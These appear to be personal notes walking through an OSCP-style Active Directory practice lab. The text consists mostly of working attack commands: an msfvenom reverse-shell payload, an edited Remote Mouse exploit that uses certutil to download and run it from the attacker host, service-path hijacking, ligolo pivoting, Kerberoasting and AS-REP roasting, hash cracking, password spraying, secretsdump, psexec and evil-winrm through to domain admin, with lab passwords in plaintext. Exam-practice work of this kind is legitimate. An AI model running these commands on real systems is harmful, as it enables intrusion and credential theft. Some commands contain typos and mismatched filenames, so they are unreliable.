Path #1: https://www.youtube.com/watch?v=gY_9Dncjw-s
Make sure to watch Derron C's video and give him the credit that he deserves!

---------------------------------------------------------

VPN:

cd Desktop
mkdir ad_lab
cd ad_lab
mkdir vpn ms01 ms02 dc01
ll
cd vpn
mv ~/Downloads/profile.ovpn .
ll
sudo OpenVPN *.ovpn

---------------------------------------------------------------------------------

Scan Hosts:

cd Desktop/ad_lab/ms01
ll
mkdir enu loot files exploits
ll

Try to Ping to see if the firewall is on.
sudo vim /etc/hosts
- 192.168.100.201 ms01
- 10.10.1.202 ms02
- 10.10.1.200 dc01

ping -c 2 ms01


ICMP may be blocked. Try nmap.

sudo nmap -T4 -p- -v ms01 -oN enu/nmap-ports.log

(Since Port 80 is open, we will try directory brute forcing /usr/share/wordlists/)
(Since Port 1978, 1979, and 1980 are open, we will enumerate the sql dbs)

We will also do a service/version scan on the open ports:
sudo nmap -T4 -p80,443,1978-1980 -sCV -v ms01 -oN enu/nmap-services.log
- We found SIN 15win nop nop 300 when fingerprinting unisql (port 1978) and pearldoc-xact (port 1980)
- Note: Create a script to find patterns that appear across multiple ports
-----------------------------------------------------------------------------------

Directory Brute Forcing:

cd Desktop/ad_lab/ms01
gobuster dir -u http://ms01 -w /usr/share/dirb/wordlists/common.txt | tee enu/gobuster-p80.log

Run without "tee" for colors.

gobuster dir -u http://ms01 -w /usr/share/dirb/wordlists/common.txt

Open all the pages that exist and don't give a 403.

We have an uploads directory (Status: 301).
Go to: ms01/uploads, download any files and view the metadata.
- mv ~/Downloads/file.exe .
- exiftool file.exe (Look for software names/version numbers)
--- We found Remote Mouse 3.008

---------------------------------------------------------------------------------

Remote Mouse:
searchsploit remote mouse 3.008
cd ../exploits
searchsploit -x 46697
(We find the same "SIN 15win nop nop 300" that we found when fingerprinting)
(This is the line in the script that needs to be updated: "SendString("calc.exe",ip)")
- Note: You can also use "strings" on an executable.

mkdir ~/Desktop/ad_lab/payloads
cd ~/Desktop/ad_lab/payloads
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.11.11 LPORT=443 -f exe -o winrev443.exe
(Note, we used 443 because it seems the firewall is on (given the ping did not succeed)
ll
python -m http.server 80
cd ~/Desktop/ad_lab/exploits/
searchsploit -m 46697
vim 46697.py
Change "calc.exe" to: "certutil.exe -urlcache -f http://172.16.11.11/winrev443.exe \users\public\winrev443.exe"
(You can also save it to \windows\temp)
python2 46697.py
(It tells us we are missing a variable)
python2 46697.py ms01
(Wait a while, until our python3 http server serves the executable)
Comment out the line in the exploit and add the following line below:
Change "calc.exe" to: "\users\public\winrev443.exe"
nc -nvlp 443
whoami
(We are a local account, not a domain account)
whoami /priv
(SeShutdownPrivilege) is present (even though not enabled. This means we can restart the machine to potentially trigger service execution.)
net localgroup Administrators
(We see "OSCP\Domain Admins". That means this is a domain joined machine.)
--------------------------------------------------------------------------------

Winpeas

cd ~/Desktop/ad_lab/ms01/payloads
mv /Downloads/winPEASx64.exe ./winpeas.exe
python -m http.server 80
certuril.exe -urlcache -f http://172.16.11.11/winpeas.exe winpeas.exe
winpeas.exe
(Anything in Red, worth looking at. Especially vulnerabilities, cached logons, users (local admin, logged on), powershell history. If only NTLMv2 is enabled, we won't be able to pass the hashes)
(For WiseBootAssistant, we see "No quotes or space detected and file permissions that all authenticated users can overwrite. (C:\apps\Wise\Wise.exe is the exploitable path))
sc query | findstr /i wise
sc qc wisebootassistant
(We should get a shell as local system)
cd C:\apps\wise
copy \users\public\win443.exe .\Wise.exe
shutdown -r -t 0
nc -nvlp 443
whoami

------------------------------------------------------------------------------
Proof.txt
dir /s /b proof.txt
type C:\Users\Administrator\Desktop\proof.txt
whoami
ipconfig
hostname
(Take a screenshot of this, for your exam)

-------------------------------------------------------------------------------

Pivoting:
dir C:\Users
cd C:\Users\wyldstyle
tree /f /a
dir /s/b *.log
type C:\Users\wyldstyle\AppData\Roaming\Microsoft\Windows\PowerShell\PsReadLine\ConsoleHost_history.txt
(We see this in the PowerShell History:
$pass = ConvertTo-SecureString "Awesome24!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("wyldstyle",$pass)
Enter-PSSession -ComputerName MS03 -Credential $cred
)
(Save the credentials to a local file)
cd ~/Downloads
ll
7z x ligolo-ng_agent_0.4.4_windows_amd64.zip
ll
mv agent.exe ~/Desktop/ad_lab/payloads
gunzip -d ligolo-ng_agent_0.4.4_linux_amd64.zip
ll
sudo mv proxy /usr/bin/
ll
rm ./*
ll
proxy --help
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
ifconfig
cd ~/Desktop/ad_lab/payloads
ll
sudo python -m http.server 80
proxy -selfcert
cd C:\Users\Public
certutil.exe -urlcache -f http://172.16.11.11/agent.exe agent.exe
agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert
session
1
ifconfig
start
sudo ip route add 10.10.1.0/24 dev ligolo
ip route
-----------------------------------------------------------------------------

Internal Network Enumeration:
cd Desktop/ad_lab/dc01
mkdir enu loot files exploits
ping -c 2 dc01
sudo nmap -T4 -p- -sCV --open -v dc01 -oN enu/nmap-ports-versions.log
(Port 445 is open)
cd Desktop/ad_lab/ms02
mkdir enu files loot exploits
sudo nmap -p- -sCV -v ms02 -oN enu/nmap-ports-versions.log
(Port 135, 445, and 135 are open)
(Although the output file name is the same, we are in a different directory)
cd Desktop/ad_lab/dc01
smbclient -L //dc01 -U oscp/wyldstyle
(We find a non-default share: "backups")
smbclient //dc01 -U oscp/wyldstyle
dir
(ACCESS DENIED!!)
exit
smbclient -L //ms02 -U oscp/wyldstyle
(We find a non-default share: "setup")
smbclient //ms02 -U oscp/wyldstyle

cd ~/Desktop/ad_lab/dc01
impacket-GetUserSPNs -request -dc-ip dc01 oscp.lab/wyldstyle
vim hashes
cat hashes
hashid hashes

impacket-GetNPUsers -request -dc-ip dc01 oscp.lab/wyldstyle
vim hashes.asrep
cat hashes.asrep

hashcat hashes.asrep /usr/share/wordlists/rockyou.txt
hashcat hashes.asrep /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
(UNSUCCESSFUL CRACKING OF METALBEARD's AS REP ROAST HASH!)
hashcat hashes /usr/share/wordlists/rockyou.txt
(Successful cracking of svc_iis service account password: Portland7@)

crackmapexec
vim users
(Add wyldstyle and svc_iis)
vim passwords
(Add Awesome24! and Portland7@)

crackmapexec smb 10.10.1.200 -u users -p passwords --continue-on-success
(We can log on to DC01 as either user, but without admin access)
crackmapexec smb 10.10.1.202 -u users -p passwords --continue-on-success
(We can log on to MS02 as either user, but without admin access)

smbclient //dc01/backups -U oscp/svc_iis
dir
get it-users.zip
exit
ll
mv it-users.zip dc01/files
cd dc01/files
ll
7z x it-users.zip
ll
zip2john it-users.zip > it-users.hash
cat it-users.hash
john it-users.hash --wordlist=/usr/share/wordlists/rockyou.txt
(We got the password: T.BRICK14)
7z x it-users.zip
cat it-users.txt
(We got:
superman:Sup3rH3r0!
goodcop:GoodC0pRocks
badcop:BadC0pMeanie!
wonderwoman:W0nderW0m@nAma@zon
emmet:R3xRul3z!
)

cat it-users.txt | cut -d ':' -f 1 > users
cat it-users.txt | cut -d ':' -f 2 > password
crackmapexec smb 10.10.1.200-10.10.1.202 -u users -p passwords -d oscp.lab --continue-on-success
(We got a hit for oscp.lab\emmet:R3xRul3z! on DC01)
(We got a Pwned! hit for oscp.lab\emmet:R3xRul3z! on MS02)

------------------------------------------------------------------------------------

Lateral Movement

impacket-psexec oscp/emmet@10.10.1.202
whoami
hostname
cd \users\
dir
cd lord_business
dir
cd Desktop
dir
type proof.txt
whoami
ipconfig
hostname
(Take a screenshot of this, for your exam)
exit
cd ~/Desktop/ad_lab/ms02/loot
vim proof.txt

impacket-psexec oscp/emmet@10.10.1.202
dir /s/b lord_business\*.txt
net user
net user /domain
net user lord_business /domain
(lord_business is a domain admin!)

cd ~/Desktop/ad_lab/ms02/enu
impacket-secretsdump oscp/emmet@10.10.1.202
(We got lord_business's hash and plaintext password!)

evil-winrm -i 10.10.1.200 -u lord_business -p TAKOStuesday!
tree /f /a Administrator
cd administrator\Desktop
type proof.txt
whoami
ipconfig
hostname
download proof.txt
exit
mv proof.txt ../../dc01/loot
cd ../../dc01/loot
cat proof.txt
-------------------------------------------------------------------

Web App Enumeration:

firefox http://ms01

It redirects to: "http://ms01/dashboard/" XAMPP Apache

Go to ms01/phpMyAdmin/
(Even if you get a code 403 (Forbidden), the page may tell you the apache version and open ssl version).

Go to ms01/dashboard/phpinfo.php, for more information about the application stack, including the DOCUMENT_ROOT
